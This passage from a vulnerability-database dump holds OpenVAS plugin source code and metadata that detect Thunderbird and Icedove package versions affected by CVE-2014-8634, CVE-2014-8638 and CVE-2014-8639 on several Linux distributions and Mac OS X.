discovered\nmultiple memory safety issues in Thunderbird. If a user were tricked in to opening a\nspecially crafted message with scripting enabled, an attacker could potentially\nexploit these to cause a denial of service via application crash, or\nexecute arbitrary code with the privileges of the user invoking\nThunderbird. (CVE-2014-8634)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a specially\ncrafted message with scripting enabled, an attacker could potentially\nexploit this to conduct cross-site request forgery (XSRF) attacks.\n(CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially exploit\nthis to conduct session-fixation attacks. (CVE-2014-8639)\");\n script_tag(name:\"affected\", value:\"thunderbird on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2460-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2460-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:31.4.0+build1-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:31.4.0+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:31.4.0+build1-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-25T14:51:27", "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-06-25T00:00:00", "id": "OPENVAS:1361412562310805253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805253", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805253\");\n script_version(\"2019-06-25T08:25:15+0000\");\n script_cve_id(\"CVE-2014-8639\", \"CVE-2014-8638\", \"CVE-2014-8634\");\n script_bugtraq_id(72046, 72047, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-25 08:25:15 +0000 (Tue, 25 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 14:31:54 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - Some unspecified errors.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions, and compromise a user's\n system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird before version 31.4\n on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version\n 31.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Thunderbird/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!tbVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:tbVer, test_version:\"31.4\"))\n{\n fix = \"31.4\";\n report = 'Installed version: ' + tbVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:54", "description": "Check the version of thunderbird", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2015:0047 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882088", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2015:0047 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882088\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:56:08 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for thunderbird CESA-2015:0047 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A web\npage containing malicious content could allow a remote attacker to conduct\na Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nand Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Thunderbird 31.4.0. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes\nto take effect.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0047\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020878.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~31.4.0~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:45", "description": "Multiple security issues have been found\nin Icedove, Debian", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3132-1 (icedove - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703132", "href": "http://plugins.openvas.org/nasl.php?oid=703132", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3132.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3132-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703132);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_name(\"Debian Security Advisory DSA 3132-1 (icedove - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-01-19 00:00:00 +0100 (Mon, 19 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3132.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"icedove on Debian Linux\");\n script_tag(name: \"insight\", value: \"Icedove is an unbranded Thunderbird\nmail client suitable for free distribution. It supports different mail accounts\n(POP, IMAP, Gmail), has an integrated learning Spam filter, and offers easy\norganization of mails with tagging and virtual folders. Also, more features can\nbe added by installing extensions.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 31.4.0-1~deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0-1.\n\nWe recommend that you upgrade your icedove packages.\");\n script_tag(name: \"summary\", value: \"Multiple security issues have been found\nin Icedove, Debian's version of the Mozilla Thunderbird mail and news client:\nMultiple memory safety errors and implementation errors may lead to the execution\nof arbitrary code, information leaks or denial of service.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"calendar-timezones\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"31.4.0-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:21", "description": "Oracle Linux Local Security Checks ELSA-2015-0047", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-0047", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123205", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0047.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123205\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0047\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0047 - thunderbird security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0047\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0047.html\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~31.4.0~1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~31.4.0~1.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:13", "description": "Multiple security issues have been found\nin Icedove, Debian", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3132-1 (icedove - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703132", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703132", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3132.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3132-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703132\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_name(\"Debian Security Advisory DSA 3132-1 (icedove - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-19 00:00:00 +0100 (Mon, 19 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3132.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"icedove on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 31.4.0-1~deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0-1.\n\nWe recommend that you upgrade your icedove packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been found\nin Icedove, Debian's version of the Mozilla Thunderbird mail and news client:\nMultiple memory safety errors and implementation errors may lead to the execution\nof arbitrary code, information leaks or denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"calendar-timezones\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"31.4.0-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:30", "description": "Gentoo Linux Local Security Checks GLSA 201504-01", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201504-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0824", "CVE-2014-1505", "CVE-2014-1536", "CVE-2014-1577", "CVE-2014-1513", "CVE-2013-5601", "CVE-2013-5612", "CVE-2015-0831", "CVE-2013-5595", "CVE-2014-1530", "CVE-2014-1590", "CVE-2014-1586", "CVE-2014-1583", "CVE-2015-0832", "CVE-2013-5616", "CVE-2013-5607", "CVE-2014-1510", "CVE-2014-1566", "CVE-2013-5598", "CVE-2013-5613", "CVE-2014-1522", "CVE-2014-1587", "CVE-2014-1567", "CVE-2014-1481", "CVE-2014-1539", "CVE-2014-1487", "CVE-2015-0825", "CVE-2014-1594", "CVE-2014-1538", "CVE-2013-5609", "CVE-2015-0821", "CVE-2014-1525", "CVE-2013-5619", "CVE-2014-1509", "CVE-2014-1494", "CVE-2014-1559", "CVE-2014-1537", "CVE-2014-1582", "CVE-2014-1523", "CVE-2014-1576", "CVE-2014-8631", "CVE-2013-5615", "CVE-2014-1529", "CVE-2015-0828", "CVE-2013-5597", "CVE-2014-1543", "CVE-2014-1486", "CVE-2013-5590", "CVE-2013-5605", "CVE-2013-5610", "CVE-2014-1532", "CVE-2013-6671", "CVE-2014-1548", "CVE-2014-1584", "CVE-2014-1588", "CVE-2015-0826", "CVE-2014-1531", "CVE-2014-1508", "CVE-2014-1502", "CVE-2014-1542", "CVE-2014-1477", "CVE-2014-1578", "CVE-2013-1741", "CVE-2014-1540", "CVE-2014-1534", "CVE-2014-8642", "CVE-2014-1482", "CVE-2014-8637", "CVE-2014-1479", "CVE-2014-1504", "CVE-2014-8636", "CVE-2014-1580", "CVE-2014-1511", "CVE-2015-0819", "CVE-2014-1520", "CVE-2015-0834", "CVE-2014-1545", "CVE-2013-5592", "CVE-2014-1492", "CVE-2014-1556", "CVE-2013-5606", "CVE-2015-0818", "CVE-2014-1563", "CVE-2014-1524", "CVE-2014-8632", "CVE-2014-1512", "CVE-2014-1581", "CVE-2013-5604", "CVE-2014-1514", "CVE-2014-1592", "CVE-2014-8641", "CVE-2014-1490", "CVE-2015-0835", "CVE-2014-1498", "CVE-2014-1589", "CVE-2014-1565", "CVE-2014-1568", "CVE-2014-1555", "CVE-2014-1564", "CVE-2014-1574", "CVE-2014-1558", "CVE-2014-1551", "CVE-2014-1519", "CVE-2014-1547", "CVE-2014-1480", "CVE-2014-5369", "CVE-2014-1500", "CVE-2014-1497", "CVE-2013-5596", "CVE-2014-1478", "CVE-2014-1485", "CVE-2015-0817", "CVE-2014-1493", "CVE-2014-1544", "CVE-2014-8634", "CVE-2013-2566", "CVE-2015-0823", "CVE-2013-5603", "CVE-2013-6673", "CVE-2014-1562", "CVE-2015-0836", "CVE-2014-1541", "CVE-2014-1488", "CVE-2014-1552", "CVE-2013-5599", "CVE-2014-1553", "CVE-2014-8639", "CVE-2015-0829", "CVE-2014-1549", "CVE-2013-5591", "CVE-2013-5602", "CVE-2015-0822", "CVE-2014-1496", "CVE-2014-1554", "CVE-2015-0830", "CVE-2015-0827", "CVE-2014-8640", "CVE-2014-1557", "CVE-2014-1526", "CVE-2013-5593", "CVE-2014-1550", "CVE-2014-1533", "CVE-2014-1491", "CVE-2013-6672", "CVE-2013-5614", "CVE-2014-1575", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-1560", "CVE-2014-1585", "CVE-2014-1483", "CVE-2014-1489", "CVE-2014-1591", "CVE-2014-1593", "CVE-2015-0820", "CVE-2013-5600", "CVE-2014-1499", "CVE-2014-1518", "CVE-2014-1561", "CVE-2015-0833", "CVE-2013-5618"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121368", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121368", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201504-01.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121368\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:42 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", 